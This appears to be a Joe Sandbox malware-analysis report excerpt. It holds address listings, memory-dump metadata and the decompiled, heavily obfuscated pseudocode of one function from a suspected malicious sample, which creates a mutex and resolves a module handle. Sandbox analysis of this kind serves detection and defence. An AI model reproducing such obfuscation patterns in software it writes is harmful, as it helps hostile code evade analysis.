                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01188685
                                                                                                                                                                                                                                                                      0x011886ac
                                                                                                                                                                                                                                                                      0x011886ac
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011886ac
                                                                                                                                                                                                                                                                      0x011886a9
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011886a9
                                                                                                                                                                                                                                                                      0x01188664
                                                                                                                                                                                                                                                                      0x0118865f
                                                                                                                                                                                                                                                                      0x011886af
                                                                                                                                                                                                                                                                      0x011886af
                                                                                                                                                                                                                                                                      0x011886b1
                                                                                                                                                                                                                                                                      0x011886bb
                                                                                                                                                                                                                                                                      0x011886bb
                                                                                                                                                                                                                                                                      0x011886be
                                                                                                                                                                                                                                                                      0x011886c0
                                                                                                                                                                                                                                                                      0x011886c2
                                                                                                                                                                                                                                                                      0x011886c4
                                                                                                                                                                                                                                                                      0x011886c9
                                                                                                                                                                                                                                                                      0x011886cc
                                                                                                                                                                                                                                                                      0x011886cc
                                                                                                                                                                                                                                                                      0x011886cf
                                                                                                                                                                                                                                                                      0x011886d2
                                                                                                                                                                                                                                                                      0x011886d5
                                                                                                                                                                                                                                                                      0x011886d7
                                                                                                                                                                                                                                                                      0x011886ec
                                                                                                                                                                                                                                                                      0x011886ee
                                                                                                                                                                                                                                                                      0x011886f0
                                                                                                                                                                                                                                                                      0x011886f2
                                                                                                                                                                                                                                                                      0x011886f4
                                                                                                                                                                                                                                                                      0x011886f6
                                                                                                                                                                                                                                                                      0x011886f8
                                                                                                                                                                                                                                                                      0x011886fa
                                                                                                                                                                                                                                                                      0x011886fd
                                                                                                                                                                                                                                                                      0x011886fd
                                                                                                                                                                                                                                                                      0x01188701
                                                                                                                                                                                                                                                                      0x01188703
                                                                                                                                                                                                                                                                      0x01188709
                                                                                                                                                                                                                                                                      0x0118870c
                                                                                                                                                                                                                                                                      0x0118870c
                                                                                                                                                                                                                                                                      0x0118870c
                                                                                                                                                                                                                                                                      0x01188710
                                                                                                                                                                                                                                                                      0x01188710
                                                                                                                                                                                                                                                                      0x01188715
                                                                                                                                                                                                                                                                      0x01188718
                                                                                                                                                                                                                                                                      0x01188718
                                                                                                                                                                                                                                                                      0x0118871d
                                                                                                                                                                                                                                                                      0x0118871f
                                                                                                                                                                                                                                                                      0x01188721
                                                                                                                                                                                                                                                                      0x01188728
                                                                                                                                                                                                                                                                      0x01188728
                                                                                                                                                                                                                                                                      0x0118872a
                                                                                                                                                                                                                                                                      0x0118872f
                                                                                                                                                                                                                                                                      0x01188731
                                                                                                                                                                                                                                                                      0x01188734
                                                                                                                                                                                                                                                                      0x01188734
                                                                                                                                                                                                                                                                      0x01188737
                                                                                                                                                                                                                                                                      0x01188740
                                                                                                                                                                                                                                                                      0x01188740
                                                                                                                                                                                                                                                                      0x01188742
                                                                                                                                                                                                                                                                      0x01188742
                                                                                                                                                                                                                                                                      0x01188747
                                                                                                                                                                                                                                                                      0x0118874d
                                                                                                                                                                                                                                                                      0x01188751
                                                                                                                                                                                                                                                                      0x01188754
                                                                                                                                                                                                                                                                      0x01188757
                                                                                                                                                                                                                                                                      0x01188759
                                                                                                                                                                                                                                                                      0x01188759
                                                                                                                                                                                                                                                                      0x01188759
                                                                                                                                                                                                                                                                      0x0118875e
                                                                                                                                                                                                                                                                      0x0118875e
                                                                                                                                                                                                                                                                      0x01188761
                                                                                                                                                                                                                                                                      0x01188764
                                                                                                                                                                                                                                                                      0x01188723
                                                                                                                                                                                                                                                                      0x01188723
                                                                                                                                                                                                                                                                      0x01188726
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01188726
                                                                                                                                                                                                                                                                      0x01188721
                                                                                                                                                                                                                                                                      0x0118876b
                                                                                                                                                                                                                                                                      0x0118876b
                                                                                                                                                                                                                                                                      0x0118876c
                                                                                                                                                                                                                                                                      0x011886b3
                                                                                                                                                                                                                                                                      0x011886b3
                                                                                                                                                                                                                                                                      0x011886b5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011886b5
                                                                                                                                                                                                                                                                      0x0118877c
                                                                                                                                                                                                                                                                      0x01188781
                                                                                                                                                                                                                                                                      0x01188784
                                                                                                                                                                                                                                                                      0x01188788
                                                                                                                                                                                                                                                                      0x01188789
                                                                                                                                                                                                                                                                      0x0118878c
                                                                                                                                                                                                                                                                      0x0118878f
                                                                                                                                                                                                                                                                      0x01188790
                                                                                                                                                                                                                                                                      0x01188793
                                                                                                                                                                                                                                                                      0x01188796
                                                                                                                                                                                                                                                                      0x01188799
                                                                                                                                                                                                                                                                      0x0118879c
                                                                                                                                                                                                                                                                      0x0118879c
                                                                                                                                                                                                                                                                      0x011887a4
                                                                                                                                                                                                                                                                      0x011887ab
                                                                                                                                                                                                                                                                      0x011887ac
                                                                                                                                                                                                                                                                      0x011887ae
                                                                                                                                                                                                                                                                      0x011887b0
                                                                                                                                                                                                                                                                      0x011887b2
                                                                                                                                                                                                                                                                      0x011887b5
                                                                                                                                                                                                                                                                      0x011887c0
                                                                                                                                                                                                                                                                      0x011887c0
                                                                                                                                                                                                                                                                      0x011887c6
                                                                                                                                                                                                                                                                      0x011887c6
                                                                                                                                                                                                                                                                      0x011887c9
                                                                                                                                                                                                                                                                      0x011887ca
                                                                                                                                                                                                                                                                      0x011887ca
                                                                                                                                                                                                                                                                      0x011887c0
                                                                                                                                                                                                                                                                      0x011887ce
                                                                                                                                                                                                                                                                      0x011887d0
                                                                                                                                                                                                                                                                      0x011887d2
                                                                                                                                                                                                                                                                      0x011887d4
                                                                                                                                                                                                                                                                      0x011887d4
                                                                                                                                                                                                                                                                      0x011887d6
                                                                                                                                                                                                                                                                      0x011887da
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011887dc
                                                                                                                                                                                                                                                                      0x011887dc
                                                                                                                                                                                                                                                                      0x011887df
                                                                                                                                                                                                                                                                      0x011887e1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011887e1
                                                                                                                                                                                                                                                                      0x011887d4
                                                                                                                                                                                                                                                                      0x011887e3
                                                                                                                                                                                                                                                                      0x011887ed
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011884f8
                                                                                                                                                                                                                                                                      0x01188382
                                                                                                                                                                                                                                                                      0x01188382
                                                                                                                                                                                                                                                                      0x01188382
                                                                                                                                                                                                                                                                      0x01188385
                                                                                                                                                                                                                                                                      0x01188388
                                                                                                                                                                                                                                                                      0x0118838b
                                                                                                                                                                                                                                                                      0x011883bc
                                                                                                                                                                                                                                                                      0x011883be
                                                                                                                                                                                                                                                                      0x01188409
                                                                                                                                                                                                                                                                      0x0118840b
                                                                                                                                                                                                                                                                      0x01188412
                                                                                                                                                                                                                                                                      0x01188419
                                                                                                                                                                                                                                                                      0x0118841c
                                                                                                                                                                                                                                                                      0x0118841f
                                                                                                                                                                                                                                                                      0x01188425
                                                                                                                                                                                                                                                                      0x01188425
                                                                                                                                                                                                                                                                      0x01188426
                                                                                                                                                                                                                                                                      0x01188429
                                                                                                                                                                                                                                                                      0x01188430
                                                                                                                                                                                                                                                                      0x01188439
                                                                                                                                                                                                                                                                      0x0118843e
                                                                                                                                                                                                                                                                      0x01188441
                                                                                                                                                                                                                                                                      0x01188446
                                                                                                                                                                                                                                                                      0x01188449
                                                                                                                                                                                                                                                                      0x0118844b
                                                                                                                                                                                                                                                                      0x01188450
                                                                                                                                                                                                                                                                      0x01188453
                                                                                                                                                                                                                                                                      0x01188456
                                                                                                                                                                                                                                                                      0x01188456
                                                                                                                                                                                                                                                                      0x01188456
                                                                                                                                                                                                                                                                      0x0118845a
                                                                                                                                                                                                                                                                      0x0118845d
                                                                                                                                                                                                                                                                      0x0118845d
                                                                                                                                                                                                                                                                      0x01188462
                                                                                                                                                                                                                                                                      0x01188462
                                                                                                                                                                                                                                                                      0x0118846d
                                                                                                                                                                                                                                                                      0x01188478
                                                                                                                                                                                                                                                                      0x01188478
                                                                                                                                                                                                                                                                      0x0118847b
                                                                                                                                                                                                                                                                      0x01188487
                                                                                                                                                                                                                                                                      0x0118848c
                                                                                                                                                                                                                                                                      0x01188497
                                                                                                                                                                                                                                                                      0x01188499
                                                                                                                                                                                                                                                                      0x0118849b
                                                                                                                                                                                                                                                                      0x011884a1
                                                                                                                                                                                                                                                                      0x011884a6
                                                                                                                                                                                                                                                                      0x011884a8
                                                                                                                                                                                                                                                                      0x011884ae
                                                                                                                                                                                                                                                                      0x011883c0
                                                                                                                                                                                                                                                                      0x011883cc
                                                                                                                                                                                                                                                                      0x011883cf
                                                                                                                                                                                                                                                                      0x011883df
                                                                                                                                                                                                                                                                      0x011883e5
                                                                                                                                                                                                                                                                      0x011883ec
                                                                                                                                                                                                                                                                      0x011883ee
                                                                                                                                                                                                                                                                      0x011883f6
                                                                                                                                                                                                                                                                      0x011883f8
                                                                                                                                                                                                                                                                      0x011883fa
                                                                                                                                                                                                                                                                      0x011883ff
                                                                                                                                                                                                                                                                      0x01188402
                                                                                                                                                                                                                                                                      0x01188408
                                                                                                                                                                                                                                                                      0x01188408
                                                                                                                                                                                                                                                                      0x0118838d
                                                                                                                                                                                                                                                                      0x01188394
                                                                                                                                                                                                                                                                      0x0118839a
                                                                                                                                                                                                                                                                      0x011883a9
                                                                                                                                                                                                                                                                      0x011883b3
                                                                                                                                                                                                                                                                      0x011883bb
                                                                                                                                                                                                                                                                      0x011883bb
                                                                                                                                                                                                                                                                      0x0118838b
                                                                                                                                                                                                                                                                      0x01188366
                                                                                                                                                                                                                                                                      0x01188369
                                                                                                                                                                                                                                                                      0x0118836f
                                                                                                                                                                                                                                                                      0x0118836f
                                                                                                                                                                                                                                                                      0x01188355
                                                                                                                                                                                                                                                                      0x0118835b
                                                                                                                                                                                                                                                                      0x0118835b

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 81cd660e0cd64c9a35aeb3573f42dcaad1a088f0ddec36f7bbe802a1a74e3811
                                                                                                                                                                                                                                                                      • Instruction ID: 4212a8aa9cacecdb27fff2acde299ec00d941a3779e20ef654ce175fa51dfdf0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81cd660e0cd64c9a35aeb3573f42dcaad1a088f0ddec36f7bbe802a1a74e3811
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25022B71E002199FDF18DFADD8906ADBBF1EF48324F658169D919E7384D730AA418F90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                                                                                      			E01183690() {
                                                                                                                                                                                                                                                                      				intOrPtr _t247;
                                                                                                                                                                                                                                                                      				intOrPtr _t255;
                                                                                                                                                                                                                                                                      				intOrPtr _t262;
                                                                                                                                                                                                                                                                      				intOrPtr _t294;
                                                                                                                                                                                                                                                                      				intOrPtr _t301;
                                                                                                                                                                                                                                                                      				intOrPtr _t332;
                                                                                                                                                                                                                                                                      				intOrPtr _t351;
                                                                                                                                                                                                                                                                      				intOrPtr _t368;
                                                                                                                                                                                                                                                                      				signed int _t389;
                                                                                                                                                                                                                                                                      				intOrPtr _t448;
                                                                                                                                                                                                                                                                      				intOrPtr _t449;
                                                                                                                                                                                                                                                                      				intOrPtr _t459;
                                                                                                                                                                                                                                                                      				intOrPtr* _t498;
                                                                                                                                                                                                                                                                      				void* _t500;
                                                                                                                                                                                                                                                                      				void* _t509;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t498 = _t500 - 0x60;
                                                                                                                                                                                                                                                                      				 *(_t498 + 0x58) =  *(_t498 + 0x7c) - 0xef;
                                                                                                                                                                                                                                                                      				 *(_t498 + 0x50) =  *(_t498 + 0x7c) ^ 0x000000a5;
                                                                                                                                                                                                                                                                      				 *(_t498 + 0x5c) =  *(_t498 + 0x7c) - 0x2687;
                                                                                                                                                                                                                                                                      				 *(_t498 + 0x48) =  *(_t498 + 0x6c) ^ 0x0000253b;
                                                                                                                                                                                                                                                                      				 *(_t498 + 0x4c) =  *(_t498 + 0x74) ^ 0x00000d5f;
                                                                                                                                                                                                                                                                      				 *(_t498 + 0x54) =  *(_t498 + 0x7c) + 0x4d;
                                                                                                                                                                                                                                                                      				 *(_t498 + 0x44) =  *(_t498 + 0x7c) + 0x5e;
                                                                                                                                                                                                                                                                      				if( *(_t498 + 0x58) > ( *(_t498 + 0x5c) ^ 0x00002796)) {
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 - 0x18)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                                      					 *(_t498 - 0x14) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc71) ^  *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadbfd);
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 - 0x10)) =  *(_t498 + 0x50) -  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc29));
                                                                                                                                                                                                                                                                      					_t247 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *(_t498 - 0xc) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xf4) ^  *(_t498 + 0x5c) |  *(_t247 + 0x4c);
                                                                                                                                                                                                                                                                      					 *(_t498 - 8) =  *(_t498 + 0x48) |  *(_t498 + 0x50);
                                                                                                                                                                                                                                                                      					_t332 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *(_t498 - 4) = ( *(_t332 + 0xbadbed) |  *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc65)) ^  *(_t498 + 0x58);
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x5c) = E01182800( *((intOrPtr*)(_t498 - 0x18)),  *(_t498 - 0x14),  *((intOrPtr*)(_t498 - 0x10)),  *(_t498 - 0xc),  *(_t498 - 8),  *(_t498 - 4));
                                                                                                                                                                                                                                                                      					 *(_t498 - 0x24) =  *(_t498 + 0x4c) ^  *0x121d69c;
                                                                                                                                                                                                                                                                      					_t255 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *(_t498 - 0x20) = ( *(_t498 + 0x44) ^  *(_t498 + 0x58)) -  *((intOrPtr*)(_t255 + 0xbadbdd));
                                                                                                                                                                                                                                                                      					 *(_t498 - 0x1c) = ( *( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc81) ^  *( *((intOrPtr*)(_t498 + 0x78)) + 0xdc)) +  *0x121d69c;
                                                                                                                                                                                                                                                                      					CreateMutexA( *(_t498 - 0x24),  *(_t498 - 0x20),  *(_t498 - 0x1c));
                                                                                                                                                                                                                                                                      					 *(_t498 - 0x28) =  *(_t498 + 0x50) | 0x00002506;
                                                                                                                                                                                                                                                                      					GetModuleHandleA( *(_t498 - 0x28));
                                                                                                                                                                                                                                                                      					 *(_t498 - 0x40) =  *(_t498 + 0x4c) &  *( *((intOrPtr*)(_t498 + 0x78)) + 0xb0) ^  *(_t498 + 0x54);
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 - 0x3c)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                                      					 *(_t498 - 0x38) =  *(_t498 + 0x50) & 0x00002506;
                                                                                                                                                                                                                                                                      					_t262 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 - 0x34)) = ( *(_t498 + 0x58) ^  *(_t262 + 0xbadca9)) - 0x26e5;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 - 0x30)) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xdc) -  *(_t498 + 0x50);
                                                                                                                                                                                                                                                                      					_t351 =  *0x121d6a4; // 0x0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 - 0x2c)) = _t351 -  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xd4));
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x50) = E01195EA0( *(_t498 - 0x40),  *((intOrPtr*)(_t498 - 0x3c)),  *(_t498 - 0x38),  *((intOrPtr*)(_t498 - 0x34)),  *((intOrPtr*)(_t498 - 0x30)),  *((intOrPtr*)(_t498 - 0x2c)));
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc15)) = ( *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) - 0x00002796 | 0x00002628) +  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xbadc15));
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x54) = ( *(_t498 + 0x58) *  *(_t498 + 0x54) | 0x000025a0) ^  *(_t498 + 0x54);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x28)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x2c)) =  *(_t498 + 0x58) - 0x33;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x30) =  *(_t498 + 0x4c) ^ 0x00000063;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x34)) =  *(_t498 + 0x54) + 0x11;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x38)) =  *(_t498 + 0x54) + 0xc2;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x3c)) =  *(_t498 + 0x5c) + 0x2687;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x5c) = E01182800( *((intOrPtr*)(_t498 + 0x28)),  *((intOrPtr*)(_t498 + 0x2c)),  *(_t498 + 0x30),  *((intOrPtr*)(_t498 + 0x34)),  *((intOrPtr*)(_t498 + 0x38)),  *((intOrPtr*)(_t498 + 0x3c)));
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x4c) =  *(_t498 + 0x4c) ^ 0x000002dc;
                                                                                                                                                                                                                                                                      					_t459 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t40 = _t459 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      					_t294 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t294 + 0x9c)) =  *_t40 -  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xa4)) + 0x658d1;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x14)) =  *(_t498 + 0x48) + 0x2598;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x18) =  *(_t498 + 0x5c) ^ 0x00000edf;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x1c)) =  *((intOrPtr*)(_t498 + 0x78));
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x20)) =  *(_t498 + 0x58) - 0xd1;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x24) =  *(_t498 + 0x4c) ^ 0x00000282;
                                                                                                                                                                                                                                                                      					_push( *(_t498 + 0x24));
                                                                                                                                                                                                                                                                      					_push( *((intOrPtr*)(_t498 + 0x20)));
                                                                                                                                                                                                                                                                      					_push( *((intOrPtr*)(_t498 + 0x1c)));
                                                                                                                                                                                                                                                                      					_push( *(_t498 + 0x18));
                                                                                                                                                                                                                                                                      					_push( *((intOrPtr*)(_t498 + 0x14)));
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x5c) = E01181000();
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x54) =  *(_t498 + 0x54) - 0x199;
                                                                                                                                                                                                                                                                      					 *_t498 =  *(_t498 + 0x58) - 0x92;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 4)) =  *(_t498 + 0x48) + 0x2628;
                                                                                                                                                                                                                                                                      					 *(_t498 + 8) =  *(_t498 + 0x54) ^ 0x00000313;
                                                                                                                                                                                                                                                                      					_t301 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0xc)) = _t301;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t498 + 0x10)) =  *(_t498 + 0x50) - 0x8a;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x5c) = E01182590( *_t498,  *((intOrPtr*)(_t498 + 4)),  *(_t498 + 8),  *((intOrPtr*)(_t498 + 0xc)),  *((intOrPtr*)(_t498 + 0x10)));
                                                                                                                                                                                                                                                                      					_t389 =  *0x121d618; // 0x38fa
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x40) = _t389;
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						_t509 =  *(_t498 + 0x40) -  *0x121d61c; // 0x4351e17c
                                                                                                                                                                                                                                                                      						if(_t509 > 0) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *0x121d690 =  *(_t498 + 0x40) *  *(_t498 + 0x40) +  *0x121d690;
                                                                                                                                                                                                                                                                      						 *0x0121D664 = ( *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xac)) - 0x1a0e73) *  *0x0121D664;
                                                                                                                                                                                                                                                                      						 *0x0121D6EC =  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) - 0x00000001 |  *0x0121D6EC;
                                                                                                                                                                                                                                                                      						 *( *((intOrPtr*)(_t498 + 0x78)) + 0x7c) =  *( *((intOrPtr*)(_t498 + 0x78)) + 0xf4) + 0x2cda98ba |  *( *((intOrPtr*)(_t498 + 0x78)) + 0x7c);
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) =  *((intOrPtr*)( *((intOrPtr*)(_t498 + 0x78)) + 0xfc)) +  *( *((intOrPtr*)(_t498 + 0x78)) + 0xb0);
                                                                                                                                                                                                                                                                      						 *(_t498 + 0x40) =  *(_t498 + 0x40) + 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x50) =  *(_t498 + 0x50) - 0xe7;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x58) =  *(_t498 + 0x58) + 0x9b;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x5c) =  *(_t498 + 0x5c) - 0x65;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x4c) =  *(_t498 + 0x4c) ^ 0x000002dc;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *(_t498 + 0x4c) <  *(_t498 + 0x44) + 0x155 &&  *(_t498 + 0x48) <=  *(_t498 + 0x58) + 0xa1) {
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x44) =  *(_t498 + 0x44) ^ 0x000003de;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x48) =  *(_t498 + 0x48) + 0x26e5;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x54) =  *(_t498 + 0x54) + 0xe7;
                                                                                                                                                                                                                                                                      					_t448 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t368 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t223 = _t368 + 0xa0; // 0xab88ba4e
                                                                                                                                                                                                                                                                      					_t449 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *(_t449 + 0xa0) = ( *(_t448 + 0xbadc71) ^ 0x00000007) *  *_t223;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x48) =  *(_t498 + 0x48) ^ 0x00000edf;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x44) =  *(_t498 + 0x44) - 0x74;
                                                                                                                                                                                                                                                                      					 *(_t498 + 0x5c) =  *(_t498 + 0x5c) ^ 0x0000003d;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return  *(_t498 + 0x5c) ^ 0x00000324;
                                                                                                                                                                                                                                                                      			}


















                                                                                                                                                                                                                                                                      0x01183691
                                                                                                                                                                                                                                                                      0x011836a4
                                                                                                                                                                                                                                                                      0x011836b0
                                                                                                                                                                                                                                                                      0x011836bc
                                                                                                                                                                                                                                                                      0x011836c7
                                                                                                                                                                                                                                                                      0x011836d3
                                                                                                                                                                                                                                                                      0x011836dc
                                                                                                                                                                                                                                                                      0x011836e5
                                                                                                                                                                                                                                                                      0x011836f4
                                                                                                                                                                                                                                                                      0x0118396e
                                                                                                                                                                                                                                                                      0x01183992
                                                                                                                                                                                                                                                                      0x011839a7
                                                                                                                                                                                                                                                                      0x011839be
                                                                                                                                                                                                                                                                      0x011839c7
                                                                                                                                                                                                                                                                      0x011839d0
                                                                                                                                                                                                                                                                      0x011839e3
                                                                                                                                                                                                                                                                      0x011839fa
                                                                                                                                                                                                                                                                      0x01183a1d
                                                                                                                                                                                                                                                                      0x01183a29
                                                                                                                                                                                                                                                                      0x01183a3a
                                                                                                                                                                                                                                                                      0x01183a43
                                                                                                                                                                                                                                                                      0x01183a67
                                                                                                                                                                                                                                                                      0x01183a76
                                                                                                                                                                                                                                                                      0x01183a85
                                                                                                                                                                                                                                                                      0x01183a8c
                                                                                                                                                                                                                                                                      0x01183aa1
                                                                                                                                                                                                                                                                      0x01183aa7
                                                                                                                                                                                                                                                                      0x01183ab3
                                                                                                                                                                                                                                                                      0x01183abe
                                                                                                                                                                                                                                                                      0x01183ad3
                                                                                                                                                                                                                                                                      0x01183ae2
                                                                                                                                                                                                                                                                      0x01183af0
                                                                                                                                                                                                                                                                      0x01183afd
                                                                                                                                                                                                                                                                      0x01183b20
                                                                                                                                                                                                                                                                      0x01183b59
                                                                                                                                                                                                                                                                      0x01183b6d
                                                                                                                                                                                                                                                                      0x011836fa
                                                                                                                                                                                                                                                                      0x011836fd
                                                                                                                                                                                                                                                                      0x01183706
                                                                                                                                                                                                                                                                      0x0118370f
                                                                                                                                                                                                                                                                      0x01183718
                                                                                                                                                                                                                                                                      0x01183723
                                                                                                                                                                                                                                                                      0x0118372f
                                                                                                                                                                                                                                                                      0x01183752
                                                                                                                                                                                                                                                                      0x0118375e
                                                                                                                                                                                                                                                                      0x01183769
                                                                                                                                                                                                                                                                      0x01183772
                                                                                                                                                                                                                                                                      0x01183785
                                                                                                                                                                                                                                                                      0x0118378a
                                                                                                                                                                                                                                                                      0x01183799
                                                                                                                                                                                                                                                                      0x011837a5
                                                                                                                                                                                                                                                                      0x011837ab
                                                                                                                                                                                                                                                                      0x011837b7
                                                                                                                                                                                                                                                                      0x011837c3
                                                                                                                                                                                                                                                                      0x011837c9
                                                                                                                                                                                                                                                                      0x011837cd
                                                                                                                                                                                                                                                                      0x011837d1
                                                                                                                                                                                                                                                                      0x011837d5
                                                                                                                                                                                                                                                                      0x011837d9
                                                                                                                                                                                                                                                                      0x011837e2
                                                                                                                                                                                                                                                                      0x011837ee
                                                                                                                                                                                                                                                                      0x011837f9
                                                                                                                                                                                                                                                                      0x01183805
                                                                                                                                                                                                                                                                      0x01183811
                                                                                                                                                                                                                                                                      0x01183814
                                                                                                                                                                                                                                                                      0x01183819
                                                                                                                                                                                                                                                                      0x01183825
                                                                                                                                                                                                                                                                      0x01183844
                                                                                                                                                                                                                                                                      0x01183847
                                                                                                                                                                                                                                                                      0x0118384d
                                                                                                                                                                                                                                                                      0x0118385b
                                                                                                                                                                                                                                                                      0x0118385e
                                                                                                                                                                                                                                                                      0x01183864
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01183877
                                                                                                                                                                                                                                                                      0x011838a3
                                                                                                                                                                                                                                                                      0x011838d4
                                                                                                                                                                                                                                                                      0x01183903
                                                                                                                                                                                                                                                                      0x0118392d
                                                                                                                                                                                                                                                                      0x01183858
                                                                                                                                                                                                                                                                      0x01183858
